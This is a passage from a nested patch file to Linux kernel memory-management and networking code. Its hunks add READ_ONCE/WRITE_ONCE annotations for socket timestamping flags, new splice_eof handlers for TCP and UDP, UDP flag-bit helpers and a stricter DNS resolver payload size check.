+-	if (folio_test_private(src) &&
+-	    !filemap_release_folio(src, GFP_KERNEL))
++	if (!filemap_release_folio(src, GFP_KERNEL))
+ 		return mode == MIGRATE_SYNC ? -EAGAIN : -EBUSY;
+ 
+ 	return migrate_folio(mapping, dst, src, mode);
+diff --git a/mm/page-writeback.c b/mm/page-writeback.c
+index 7e9d8d857ecca..de5f69921b946 100644
+--- a/mm/page-writeback.c
++++ b/mm/page-writeback.c
+@@ -3078,7 +3078,7 @@ EXPORT_SYMBOL_GPL(folio_wait_writeback_killable);
+  */
+ void folio_wait_stable(struct folio *folio)
+ {
+-	if (folio_inode(folio)->i_sb->s_iflags & SB_I_STABLE_WRITES)
++	if (mapping_stable_writes(folio_mapping(folio)))
+ 		folio_wait_writeback(folio);
+ }
+ EXPORT_SYMBOL_GPL(folio_wait_stable);
+diff --git a/mm/truncate.c b/mm/truncate.c
+index c0be77e5c0083..0d4dd233f5187 100644
+--- a/mm/truncate.c
++++ b/mm/truncate.c
+@@ -19,7 +19,6 @@
+ #include <linux/highmem.h>
+ #include <linux/pagevec.h>
+ #include <linux/task_io_accounting_ops.h>
+-#include <linux/buffer_head.h>	/* grr. try_to_release_page */
+ #include <linux/shmem_fs.h>
+ #include <linux/rmap.h>
+ #include "internal.h"
+@@ -276,7 +275,7 @@ static long mapping_evict_folio(struct address_space *mapping,
+ 	if (folio_ref_count(folio) >
+ 			folio_nr_pages(folio) + folio_has_private(folio) + 1)
+ 		return 0;
+-	if (folio_has_private(folio) && !filemap_release_folio(folio, 0))
++	if (!filemap_release_folio(folio, 0))
+ 		return 0;
+ 
+ 	return remove_mapping(mapping, folio);
+@@ -581,8 +580,7 @@ static int invalidate_complete_folio2(struct address_space *mapping,
+ 	if (folio->mapping != mapping)
+ 		return 0;
+ 
+-	if (folio_has_private(folio) &&
+-	    !filemap_release_folio(folio, GFP_KERNEL))
++	if (!filemap_release_folio(folio, GFP_KERNEL))
+ 		return 0;
+ 
+ 	spin_lock(&mapping->host->i_lock);
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index 3f090faa6377f..9f3cfb7caa48d 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -1992,7 +1992,7 @@ retry:
+ 		 * (refcount == 1) it can be freed.  Otherwise, leave
+ 		 * the folio on the LRU so it is swappable.
+ 		 */
+-		if (folio_has_private(folio)) {
++		if (folio_needs_release(folio)) {
+ 			if (!filemap_release_folio(folio, sc->gfp_mask))
+ 				goto activate_locked;
+ 			if (!mapping && folio_ref_count(folio) == 1) {
+@@ -2618,9 +2618,9 @@ static void shrink_active_list(unsigned long nr_to_scan,
+ 		}
+ 
+ 		if (unlikely(buffer_heads_over_limit)) {
+-			if (folio_test_private(folio) && folio_trylock(folio)) {
+-				if (folio_test_private(folio))
+-					filemap_release_folio(folio, 0);
++			if (folio_needs_release(folio) &&
++			    folio_trylock(folio)) {
++				filemap_release_folio(folio, 0);
+ 				folio_unlock(folio);
+ 			}
+ 		}
+diff --git a/net/can/j1939/socket.c b/net/can/j1939/socket.c
+index 9c828067b4481..b0be23559243c 100644
+--- a/net/can/j1939/socket.c
++++ b/net/can/j1939/socket.c
+@@ -974,6 +974,7 @@ static void __j1939_sk_errqueue(struct j1939_session *session, struct sock *sk,
+ 	struct sock_exterr_skb *serr;
+ 	struct sk_buff *skb;
+ 	char *state = "UNK";
++	u32 tsflags;
+ 	int err;
+ 
+ 	jsk = j1939_sk(sk);
+@@ -981,13 +982,14 @@ static void __j1939_sk_errqueue(struct j1939_session *session, struct sock *sk,
+ 	if (!(jsk->state & J1939_SOCK_ERRQUEUE))
+ 		return;
+ 
++	tsflags = READ_ONCE(sk->sk_tsflags);
+ 	switch (type) {
+ 	case J1939_ERRQUEUE_TX_ACK:
+-		if (!(sk->sk_tsflags & SOF_TIMESTAMPING_TX_ACK))
++		if (!(tsflags & SOF_TIMESTAMPING_TX_ACK))
+ 			return;
+ 		break;
+ 	case J1939_ERRQUEUE_TX_SCHED:
+-		if (!(sk->sk_tsflags & SOF_TIMESTAMPING_TX_SCHED))
++		if (!(tsflags & SOF_TIMESTAMPING_TX_SCHED))
+ 			return;
+ 		break;
+ 	case J1939_ERRQUEUE_TX_ABORT:
+@@ -997,7 +999,7 @@ static void __j1939_sk_errqueue(struct j1939_session *session, struct sock *sk,
+ 	case J1939_ERRQUEUE_RX_DPO:
+ 		fallthrough;
+ 	case J1939_ERRQUEUE_RX_ABORT:
+-		if (!(sk->sk_tsflags & SOF_TIMESTAMPING_RX_SOFTWARE))
++		if (!(tsflags & SOF_TIMESTAMPING_RX_SOFTWARE))
+ 			return;
+ 		break;
+ 	default:
+@@ -1054,7 +1056,7 @@ static void __j1939_sk_errqueue(struct j1939_session *session, struct sock *sk,
+ 	}
+ 
+ 	serr->opt_stats = true;
+-	if (sk->sk_tsflags & SOF_TIMESTAMPING_OPT_ID)
++	if (tsflags & SOF_TIMESTAMPING_OPT_ID)
+ 		serr->ee.ee_data = session->tskey;
+ 
+ 	netdev_dbg(session->priv->ndev, "%s: 0x%p tskey: %i, state: %s\n",
+diff --git a/net/can/raw.c b/net/can/raw.c
+index 8c104339d538d..488320738e319 100644
+--- a/net/can/raw.c
++++ b/net/can/raw.c
+@@ -881,6 +881,7 @@ static int raw_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 
+ 	skb->dev = dev;
+ 	skb->priority = sk->sk_priority;
++	skb->mark = sk->sk_mark;
+ 	skb->tstamp = sockc.transmit_time;
+ 
+ 	skb_setup_tx_timestamp(skb, sockc.tsflags);
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 73b1e0e53534e..8a819d0a7bfb0 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -4913,7 +4913,7 @@ static void __skb_complete_tx_timestamp(struct sk_buff *skb,
+ 	serr->ee.ee_info = tstype;
+ 	serr->opt_stats = opt_stats;
+ 	serr->header.h4.iif = skb->dev ? skb->dev->ifindex : 0;
+-	if (sk->sk_tsflags & SOF_TIMESTAMPING_OPT_ID) {
++	if (READ_ONCE(sk->sk_tsflags) & SOF_TIMESTAMPING_OPT_ID) {
+ 		serr->ee.ee_data = skb_shinfo(skb)->tskey;
+ 		if (sk_is_tcp(sk))
+ 			serr->ee.ee_data -= atomic_read(&sk->sk_tskey);
+@@ -4969,21 +4969,23 @@ void __skb_tstamp_tx(struct sk_buff *orig_skb,
+ {
+ 	struct sk_buff *skb;
+ 	bool tsonly, opt_stats = false;
++	u32 tsflags;
+ 
+ 	if (!sk)
+ 		return;
+ 
+-	if (!hwtstamps && !(sk->sk_tsflags & SOF_TIMESTAMPING_OPT_TX_SWHW) &&
++	tsflags = READ_ONCE(sk->sk_tsflags);
++	if (!hwtstamps && !(tsflags & SOF_TIMESTAMPING_OPT_TX_SWHW) &&
+ 	    skb_shinfo(orig_skb)->tx_flags & SKBTX_IN_PROGRESS)
+ 		return;
+ 
+-	tsonly = sk->sk_tsflags & SOF_TIMESTAMPING_OPT_TSONLY;
++	tsonly = tsflags & SOF_TIMESTAMPING_OPT_TSONLY;
+ 	if (!skb_may_tx_timestamp(sk, tsonly))
+ 		return;
+ 
+ 	if (tsonly) {
+ #ifdef CONFIG_INET
+-		if ((sk->sk_tsflags & SOF_TIMESTAMPING_OPT_STATS) &&
++		if ((tsflags & SOF_TIMESTAMPING_OPT_STATS) &&
+ 		    sk_is_tcp(sk)) {
+ 			skb = tcp_get_timestamping_opt_stats(sk, orig_skb,
+ 							     ack_skb);
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index a5c1f67dc96ec..3818035ea0021 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -825,6 +825,8 @@ static void sk_psock_destroy(struct work_struct *work)
+ 
+ 	if (psock->sk_redir)
+ 		sock_put(psock->sk_redir);
++	if (psock->sk_pair)
++		sock_put(psock->sk_pair);
+ 	sock_put(psock->sk);
+ 	kfree(psock);
+ }
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 4305e55dbfba4..c50a14a02edd4 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -890,7 +890,7 @@ static int sock_timestamping_bind_phc(struct sock *sk, int phc_index)
+ 	if (!match)
+ 		return -EINVAL;
+ 
+-	sk->sk_bind_phc = phc_index;
++	WRITE_ONCE(sk->sk_bind_phc, phc_index);
+ 
+ 	return 0;
+ }
+@@ -926,7 +926,7 @@ int sock_set_timestamping(struct sock *sk, int optname,
+ 			return ret;
+ 	}
+ 
+-	sk->sk_tsflags = val;
++	WRITE_ONCE(sk->sk_tsflags, val);
+ 	sock_valbool_flag(sk, SOCK_TSTAMP_NEW, optname == SO_TIMESTAMPING_NEW);
+ 
+ 	if (val & SOF_TIMESTAMPING_RX_SOFTWARE)
+@@ -1704,9 +1704,16 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 		break;
+ 
+ 	case SO_TIMESTAMPING_OLD:
++	case SO_TIMESTAMPING_NEW:
+ 		lv = sizeof(v.timestamping);
+-		v.timestamping.flags = sk->sk_tsflags;
+-		v.timestamping.bind_phc = sk->sk_bind_phc;
++		/* For the later-added case SO_TIMESTAMPING_NEW: Be strict about only
++		 * returning the flags when they were set through the same option.
++		 * Don't change the beviour for the old case SO_TIMESTAMPING_OLD.
++		 */
++		if (optname == SO_TIMESTAMPING_OLD || sock_flag(sk, SOCK_TSTAMP_NEW)) {
++			v.timestamping.flags = READ_ONCE(sk->sk_tsflags);
++			v.timestamping.bind_phc = READ_ONCE(sk->sk_bind_phc);
++		}
+ 		break;
+ 
+ 	case SO_RCVTIMEO_OLD:
+@@ -2764,6 +2771,7 @@ int __sock_cmsg_send(struct sock *sk, struct msghdr *msg, struct cmsghdr *cmsg,
+ 		sockc->mark = *(u32 *)CMSG_DATA(cmsg);
+ 		break;
+ 	case SO_TIMESTAMPING_OLD:
++	case SO_TIMESTAMPING_NEW:
+ 		if (cmsg->cmsg_len != CMSG_LEN(sizeof(u32)))
+ 			return -EINVAL;
+ 
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index 38e01f82f2ef3..91140bc0541f3 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -538,6 +538,8 @@ static bool sock_map_sk_state_allowed(const struct sock *sk)
+ {
+ 	if (sk_is_tcp(sk))
+ 		return (1 << sk->sk_state) & (TCPF_ESTABLISHED | TCPF_LISTEN);
++	if (sk_is_stream_unix(sk))
++		return (1 << sk->sk_state) & TCPF_ESTABLISHED;
+ 	return true;
+ }
+ 
+diff --git a/net/dns_resolver/dns_key.c b/net/dns_resolver/dns_key.c
+index 03f8f33dc134c..8324e9f970668 100644
+--- a/net/dns_resolver/dns_key.c
++++ b/net/dns_resolver/dns_key.c
+@@ -91,8 +91,6 @@ const struct cred *dns_resolver_cache;
+ static int
+ dns_resolver_preparse(struct key_preparsed_payload *prep)
+ {
+-	const struct dns_server_list_v1_header *v1;
+-	const struct dns_payload_header *bin;
+ 	struct user_key_payload *upayload;
+ 	unsigned long derrno;
+ 	int ret;
+@@ -103,27 +101,28 @@ dns_resolver_preparse(struct key_preparsed_payload *prep)
+ 		return -EINVAL;
+ 
+ 	if (data[0] == 0) {
++		const struct dns_server_list_v1_header *v1;
++
+ 		/* It may be a server list. */
+-		if (datalen <= sizeof(*bin))
++		if (datalen <= sizeof(*v1))
+ 			return -EINVAL;
+ 
+-		bin = (const struct dns_payload_header *)data;
+-		kenter("[%u,%u],%u", bin->content, bin->version, datalen);
+-		if (bin->content != DNS_PAYLOAD_IS_SERVER_LIST) {
++		v1 = (const struct dns_server_list_v1_header *)data;
++		kenter("[%u,%u],%u", v1->hdr.content, v1->hdr.version, datalen);
++		if (v1->hdr.content != DNS_PAYLOAD_IS_SERVER_LIST) {
+ 			pr_warn_ratelimited(
+ 				"dns_resolver: Unsupported content type (%u)\n",
+-				bin->content);
++				v1->hdr.content);
+ 			return -EINVAL;
+ 		}
+ 
+-		if (bin->version != 1) {
++		if (v1->hdr.version != 1) {
+ 			pr_warn_ratelimited(
+ 				"dns_resolver: Unsupported server list version (%u)\n",
+-				bin->version);
++				v1->hdr.version);
+ 			return -EINVAL;
+ 		}
+ 
+-		v1 = (const struct dns_server_list_v1_header *)bin;
+ 		if ((v1->status != DNS_LOOKUP_GOOD &&
+ 		     v1->status != DNS_LOOKUP_GOOD_WITH_BAD)) {
+ 			if (prep->expiry == TIME64_MAX)
+diff --git a/net/ethtool/netlink.c b/net/ethtool/netlink.c
+index 1a4c11356c96c..fc4ccecf9495c 100644
+--- a/net/ethtool/netlink.c
++++ b/net/ethtool/netlink.c
+@@ -509,7 +509,7 @@ lock_and_cont:
+ cont:
+ 			idx++;
+ 		}
+-
++		ret = 0;
+ 	}
+ 	rtnl_unlock();
+ 
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 5d379df90c826..347c3768df6e8 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -838,6 +838,21 @@ int inet_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ }
+ EXPORT_SYMBOL(inet_sendmsg);
+ 
++void inet_splice_eof(struct socket *sock)
++{
++	const struct proto *prot;
++	struct sock *sk = sock->sk;
++
++	if (unlikely(inet_send_prepare(sk)))
++		return;
++
++	/* IPV6_ADDRFORM can change sk->sk_prot under us. */
++	prot = READ_ONCE(sk->sk_prot);
++	if (prot->splice_eof)
++		prot->splice_eof(sock);
++}
++EXPORT_SYMBOL_GPL(inet_splice_eof);
++
+ ssize_t inet_sendpage(struct socket *sock, struct page *page, int offset,
+ 		      size_t size, int flags)
+ {
+@@ -1057,6 +1072,7 @@ const struct proto_ops inet_stream_ops = {
+ #ifdef CONFIG_MMU
+ 	.mmap		   = tcp_mmap,
+ #endif
++	.splice_eof	   = inet_splice_eof,
+ 	.sendpage	   = inet_sendpage,
+ 	.splice_read	   = tcp_splice_read,
+ 	.read_sock	   = tcp_read_sock,
+@@ -1091,6 +1107,7 @@ const struct proto_ops inet_dgram_ops = {
+ 	.read_skb	   = udp_read_skb,
+ 	.recvmsg	   = inet_recvmsg,
+ 	.mmap		   = sock_no_mmap,
++	.splice_eof	   = inet_splice_eof,
+ 	.sendpage	   = inet_sendpage,
+ 	.set_peek_off	   = sk_set_peek_off,
+ #ifdef CONFIG_COMPAT
+@@ -1122,6 +1139,7 @@ static const struct proto_ops inet_sockraw_ops = {
+ 	.sendmsg	   = inet_sendmsg,
+ 	.recvmsg	   = inet_recvmsg,
+ 	.mmap		   = sock_no_mmap,
++	.splice_eof	   = inet_splice_eof,
+ 	.sendpage	   = inet_sendpage,
+ #ifdef CONFIG_COMPAT
+ 	.compat_ioctl	   = inet_compat_ioctl,
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index 493c679ea54f3..e19ef88ae181f 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -990,8 +990,8 @@ static int __ip_append_data(struct sock *sk,
+ 	mtu = cork->gso_size ? IP_MAX_MTU : cork->fragsize;
+ 	paged = !!cork->gso_size;
+ 
+-	if (cork->tx_flags & SKBTX_ANY_SW_TSTAMP &&
+-	    sk->sk_tsflags & SOF_TIMESTAMPING_OPT_ID)
++	if (cork->tx_flags & SKBTX_ANY_TSTAMP &&
++	    READ_ONCE(sk->sk_tsflags) & SOF_TIMESTAMPING_OPT_ID)
+ 		tskey = atomic_inc_return(&sk->sk_tskey) - 1;
+ 
+ 	hh_len = LL_RESERVED_SPACE(rt->dst.dev);
+diff --git a/net/ipv4/ip_sockglue.c b/net/ipv4/ip_sockglue.c
+index 63aa52becd880..c1fb7580ea581 100644
+--- a/net/ipv4/ip_sockglue.c
++++ b/net/ipv4/ip_sockglue.c
+@@ -509,7 +509,7 @@ static bool ipv4_datagram_support_cmsg(const struct sock *sk,
+ 	 * or without payload (SOF_TIMESTAMPING_OPT_TSONLY).
+ 	 */
+ 	info = PKTINFO_SKB_CB(skb);
+-	if (!(sk->sk_tsflags & SOF_TIMESTAMPING_OPT_CMSG) ||
++	if (!(READ_ONCE(sk->sk_tsflags) & SOF_TIMESTAMPING_OPT_CMSG) ||
+ 	    !info->ipi_ifindex)
+ 		return false;
+ 
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 58409ea2da0af..0b7844a8d5711 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -1492,6 +1492,22 @@ int tcp_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
+ }
+ EXPORT_SYMBOL(tcp_sendmsg);
+ 
++void tcp_splice_eof(struct socket *sock)
++{
++	struct sock *sk = sock->sk;
++	struct tcp_sock *tp = tcp_sk(sk);
++	int mss_now, size_goal;
++
++	if (!tcp_write_queue_tail(sk))
++		return;
++
++	lock_sock(sk);
++	mss_now = tcp_send_mss(sk, &size_goal, 0);
++	tcp_push(sk, 0, mss_now, tp->nonagle, size_goal);
++	release_sock(sk);
++}
++EXPORT_SYMBOL_GPL(tcp_splice_eof);
++
+ /*
+  *	Handle reading urgent data. BSD has very simple semantics for
+  *	this, no blocking and very strange errors 8)
+@@ -2359,14 +2375,14 @@ void tcp_recv_timestamp(struct msghdr *msg, const struct sock *sk,
+ 			}
+ 		}
+ 
+-		if (sk->sk_tsflags & SOF_TIMESTAMPING_SOFTWARE)
++		if (READ_ONCE(sk->sk_tsflags) & SOF_TIMESTAMPING_SOFTWARE)
+ 			has_timestamping = true;
+ 		else
+ 			tss->ts[0] = (struct timespec64) {0};
+ 	}
+ 
+ 	if (tss->ts[2].tv_sec || tss->ts[2].tv_nsec) {
+-		if (sk->sk_tsflags & SOF_TIMESTAMPING_RAW_HARDWARE)
++		if (READ_ONCE(sk->sk_tsflags) & SOF_TIMESTAMPING_RAW_HARDWARE)
+ 			has_timestamping = true;
+ 		else
+ 			tss->ts[2] = (struct timespec64) {0};
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index 7ebbbe561e402..be2c807eed15d 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -3067,6 +3067,7 @@ struct proto tcp_prot = {
+ 	.keepalive		= tcp_set_keepalive,
+ 	.recvmsg		= tcp_recvmsg,
+ 	.sendmsg		= tcp_sendmsg,
++	.splice_eof		= tcp_splice_eof,
+ 	.sendpage		= tcp_sendpage,
+ 	.backlog_rcv		= tcp_v4_do_rcv,
+ 	.release_cb		= tcp_release_cb,
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 65abc92a81bd0..5672d9a86c5d2 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -733,7 +733,7 @@ int __udp4_lib_err(struct sk_buff *skb, u32 info, struct udp_table *udptable)
+ 			       iph->saddr, uh->source, skb->dev->ifindex,
+ 			       inet_sdif(skb), udptable, NULL);
+ 
+-	if (!sk || udp_sk(sk)->encap_type) {
++	if (!sk || READ_ONCE(udp_sk(sk)->encap_type)) {
+ 		/* No socket for error: try tunnels before discarding */
+ 		if (static_branch_unlikely(&udp_encap_needed_key)) {
+ 			sk = __udp4_lib_err_encap(net, iph, uh, udptable, sk, skb,
+@@ -1068,7 +1068,7 @@ int udp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	__be16 dport;
+ 	u8  tos;
+ 	int err, is_udplite = IS_UDPLITE(sk);
+-	int corkreq = READ_ONCE(up->corkflag) || msg->msg_flags&MSG_MORE;
++	int corkreq = udp_test_bit(CORK, sk) || msg->msg_flags & MSG_MORE;
+ 	int (*getfrag)(void *, char *, int, int, int, struct sk_buff *);
+ 	struct sk_buff *skb;
+ 	struct ip_options_data opt_copy;
+@@ -1332,57 +1332,33 @@ do_confirm:
+ }
+ EXPORT_SYMBOL(udp_sendmsg);
+ 
+-int udp_sendpage(struct sock *sk, struct page *page, int offset,
+-		 size_t size, int flags)
++void udp_splice_eof(struct socket *sock)
+ {
+-	struct inet_sock *inet = inet_sk(sk);
++	struct sock *sk = sock->sk;
+ 	struct udp_sock *up = udp_sk(sk);
+-	int ret;
+ 
+-	if (flags & MSG_SENDPAGE_NOTLAST)
+-		flags |= MSG_MORE;
+-
+-	if (!up->pending) {
+-		struct msghdr msg = {	.msg_flags = flags|MSG_MORE };
+-
+-		/* Call udp_sendmsg to specify destination address which
+-		 * sendpage interface can't pass.
+-		 * This will succeed only when the socket is connected.
+-		 */
+-		ret = udp_sendmsg(sk, &msg, 0);
+-		if (ret < 0)
+-			return ret;
+-	}
++	if (!up->pending || udp_test_bit(CORK, sk))
++		return;
+ 
+ 	lock_sock(sk);
++	if (up->pending && !udp_test_bit(CORK, sk))
++		udp_push_pending_frames(sk);
++	release_sock(sk);
++}
++EXPORT_SYMBOL_GPL(udp_splice_eof);
+ 
+-	if (unlikely(!up->pending)) {
+-		release_sock(sk);
+-
+-		net_dbg_ratelimited("cork failed\n");
+-		return -EINVAL;
+-	}
++int udp_sendpage(struct sock *sk, struct page *page, int offset,
++		 size_t size, int flags)
++{
++	struct bio_vec bvec;
++	struct msghdr msg = { .msg_flags = flags | MSG_SPLICE_PAGES };
+ 
+-	ret = ip_append_page(sk, &inet->cork.fl.u.ip4,
+-			     page, offset, size, flags);
+-	if (ret == -EOPNOTSUPP) {
+-		release_sock(sk);
+-		return sock_no_sendpage(sk->sk_socket, page, offset,
+-					size, flags);
+-	}
+-	if (ret < 0) {
+-		udp_flush_pending_frames(sk);
+-		goto out;
+-	}
++	if (flags & MSG_SENDPAGE_NOTLAST)
++		msg.msg_flags |= MSG_MORE;
+ 
+-	up->len += size;
+-	if (!(READ_ONCE(up->corkflag) || (flags&MSG_MORE)))
+-		ret = udp_push_pending_frames(sk);
+-	if (!ret)
+-		ret = size;
+-out:
+-	release_sock(sk);
+-	return ret;
++	bvec_set_page(&bvec, page, size, offset);
++	iov_iter_bvec(&msg.msg_iter, ITER_SOURCE, &bvec, 1, size);
++	return udp_sendmsg(sk, &msg, size);
+ }
+ 
+ #define UDP_SKB_IS_STATELESS 0x80000000
+@@ -1925,7 +1901,7 @@ try_again:
+ 						      (struct sockaddr *)sin);
+ 	}
+ 
+-	if (udp_sk(sk)->gro_enabled)
++	if (udp_test_bit(GRO_ENABLED, sk))
+ 		udp_cmsg_recv(msg, sk, skb);
+ 
+ 	if (inet->cmsg_flags)
+@@ -2138,7 +2114,8 @@ static int udp_queue_rcv_one_skb(struct sock *sk, struct sk_buff *skb)
+ 	}
+ 	nf_reset_ct(skb);
+ 
+-	if (static_branch_unlikely(&udp_encap_needed_key) && up->encap_type) {
++	if (static_branch_unlikely(&udp_encap_needed_key) &&
++	    READ_ONCE(up->encap_type)) {
+ 		int (*encap_rcv)(struct sock *sk, struct sk_buff *skb);
+ 
+ 		/*
+@@ -2669,7 +2646,7 @@ void udp_destroy_sock(struct sock *sk)
+ 			if (encap_destroy)
+ 				encap_destroy(sk);
+ 		}
+-		if (up->encap_enabled)
++		if (udp_test_bit(ENCAP_ENABLED, sk))
+ 			static_branch_dec(&udp_encap_needed_key);
+ 	}
+ }
+@@ -2697,9 +2674,9 @@ int udp_lib_setsockopt(struct sock *sk, int level, int optname,
+ 	switch (optname) {
+ 	case UDP_CORK:
+ 		if (val != 0) {
+-			WRITE_ONCE(up->corkflag, 1);
++			udp_set_bit(CORK, sk);
+ 		} else {
+-			WRITE_ONCE(up->corkflag, 0);
++			udp_clear_bit(CORK, sk);
+ 			lock_sock(sk);
+ 			push_pending_frames(sk);
+ 			release_sock(sk);
+@@ -2723,10 +2700,8 @@ int udp_lib_setsockopt(struct sock *sk, int level, int optname,
+ #endif
+ 			fallthrough;
+ 		case UDP_ENCAP_L2TPINUDP:
+-			up->encap_type = val;
+-			lock_sock(sk);
+-			udp_tunnel_encap_enable(sk->sk_socket);
+-			release_sock(sk);
++			WRITE_ONCE(up->encap_type, val);
++			udp_tunnel_encap_enable(sk);
+ 			break;
+ 		default:
+ 			err = -ENOPROTOOPT;
+@@ -2735,11 +2710,11 @@ int udp_lib_setsockopt(struct sock *sk, int level, int optname,
+ 		break;
+ 
+ 	case UDP_NO_CHECK6_TX:
+-		up->no_check6_tx = valbool;
++		udp_set_no_check6_tx(sk, valbool);
+ 		break;
+ 
+ 	case UDP_NO_CHECK6_RX:
+-		up->no_check6_rx = valbool;
++		udp_set_no_check6_rx(sk, valbool);
+ 		break;
+ 
+ 	case UDP_SEGMENT:
+@@ -2749,14 +2724,12 @@ int udp_lib_setsockopt(struct sock *sk, int level, int optname,
+ 		break;
+ 
+ 	case UDP_GRO:
+-		lock_sock(sk);
+ 
+ 		/* when enabling GRO, accept the related GSO packet type */
+ 		if (valbool)
+-			udp_tunnel_encap_enable(sk->sk_socket);
+-		up->gro_enabled = valbool;
+-		up->accept_udp_l4 = valbool;
+-		release_sock(sk);
++			udp_tunnel_encap_enable(sk);
++		udp_assign_bit(GRO_ENABLED, sk, valbool);
++		udp_assign_bit(ACCEPT_L4, sk, valbool);
+ 		break;
+ 
+ 	/*
+@@ -2824,19 +2797,19 @@ int udp_lib_getsockopt(struct sock *sk, int level, int optname,
+ 
+ 	switch (optname) {
+ 	case UDP_CORK:
+-		val = READ_ONCE(up->corkflag);
++		val = udp_test_bit(CORK, sk);
+ 		break;
+ 
+ 	case UDP_ENCAP:
+-		val = up->encap_type;
++		val = READ_ONCE(up->encap_type);
+ 		break;
+ 
+ 	case UDP_NO_CHECK6_TX:
+-		val = up->no_check6_tx;
++		val = udp_get_no_check6_tx(sk);
+ 		break;
+ 
+ 	case UDP_NO_CHECK6_RX:
+-		val = up->no_check6_rx;
++		val = udp_get_no_check6_rx(sk);
+ 		break;
+ 
+ 	case UDP_SEGMENT:
+@@ -2844,7 +2817,7 @@ int udp_lib_getsockopt(struct sock *sk, int level, int optname,
+ 		break;
+ 
+ 	case UDP_GRO:
+-		val = up->gro_enabled;
++		val = udp_test_bit(GRO_ENABLED, sk);
+ 		break;
+ 
+ 	/* The following two cannot be changed on UDP sockets, the return is
+@@ -2946,6 +2919,7 @@ struct proto udp_prot = {
+ 	.getsockopt		= udp_getsockopt,
+ 	.sendmsg		= udp_sendmsg,
+ 	.recvmsg		= udp_recvmsg,
++	.splice_eof		= udp_splice_eof,
+ 	.sendpage		= udp_sendpage,
+ 	.release_cb		= ip4_datagram_release_cb,
+ 	.hash			= udp_lib_hash,
+diff --git a/net/ipv4/udp_offload.c b/net/ipv4/udp_offload.c
+index 6d1a4bec2614d..8096576fd9bde 100644
+--- a/net/ipv4/udp_offload.c
++++ b/net/ipv4/udp_offload.c
+@@ -549,10 +549,10 @@ struct sk_buff *udp_gro_receive(struct list_head *head, struct sk_buff *skb,
+ 	NAPI_GRO_CB(skb)->is_flist = 0;
+ 	if (!sk || !udp_sk(sk)->gro_receive) {
+ 		if (skb->dev->features & NETIF_F_GRO_FRAGLIST)
+-			NAPI_GRO_CB(skb)->is_flist = sk ? !udp_sk(sk)->gro_enabled : 1;
++			NAPI_GRO_CB(skb)->is_flist = sk ? !udp_test_bit(GRO_ENABLED, sk) : 1;
+ 
+ 		if ((!sk && (skb->dev->features & NETIF_F_GRO_UDP_FWD)) ||
+-		    (sk && udp_sk(sk)->gro_enabled) || NAPI_GRO_CB(skb)->is_flist)
++		    (sk && udp_test_bit(GRO_ENABLED, sk)) || NAPI_GRO_CB(skb)->is_flist)
+ 			return call_gro_receive(udp_gro_receive_segment, head, skb);
+ 
+ 		/* no GRO, be sure flush the current packet */
+diff --git a/net/ipv4/udp_tunnel_core.c b/net/ipv4/udp_tunnel_core.c
+index 5f8104cf082d0..732e21b75ba28 100644
+--- a/net/ipv4/udp_tunnel_core.c
++++ b/net/ipv4/udp_tunnel_core.c
+@@ -78,7 +78,7 @@ void setup_udp_tunnel_sock(struct net *net, struct socket *sock,
+ 	udp_sk(sk)->gro_receive = cfg->gro_receive;
+ 	udp_sk(sk)->gro_complete = cfg->gro_complete;
+ 
+-	udp_tunnel_encap_enable(sock);
++	udp_tunnel_encap_enable(sk);
+ }
+ EXPORT_SYMBOL_GPL(setup_udp_tunnel_sock);
+ 
+diff --git a/net/ipv4/xfrm4_input.c b/net/ipv4/xfrm4_input.c
+index eac206a290d05..183f6dc372429 100644
+--- a/net/ipv4/xfrm4_input.c
++++ b/net/ipv4/xfrm4_input.c
+@@ -85,11 +85,11 @@ int xfrm4_udp_encap_rcv(struct sock *sk, struct sk_buff *skb)
+ 	struct udphdr *uh;
+ 	struct iphdr *iph;
+ 	int iphlen, len;
+-
+ 	__u8 *udpdata;
+ 	__be32 *udpdata32;
+-	__u16 encap_type = up->encap_type;
++	u16 encap_type;
+ 
++	encap_type = READ_ONCE(up->encap_type);
+ 	/* if this is not encapsulated socket, then just return now */
+ 	if (!encap_type)
+ 		return 1;
+diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
+index b5309ae87fd79..a2f29ca516000 100644
+--- a/net/ipv6/af_inet6.c
++++ b/net/ipv6/af_inet6.c
+@@ -711,6 +711,7 @@ const struct proto_ops inet6_stream_ops = {
+ #ifdef CONFIG_MMU
+ 	.mmap		   = tcp_mmap,
+ #endif
++	.splice_eof	   = inet_splice_eof,
+ 	.sendpage	   = inet_sendpage,
+ 	.sendmsg_locked    = tcp_sendmsg_locked,
+ 	.sendpage_locked   = tcp_sendpage_locked,
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index 3c2b2a85de367..e9ae084d038d1 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -1506,8 +1506,8 @@ static int __ip6_append_data(struct sock *sk,
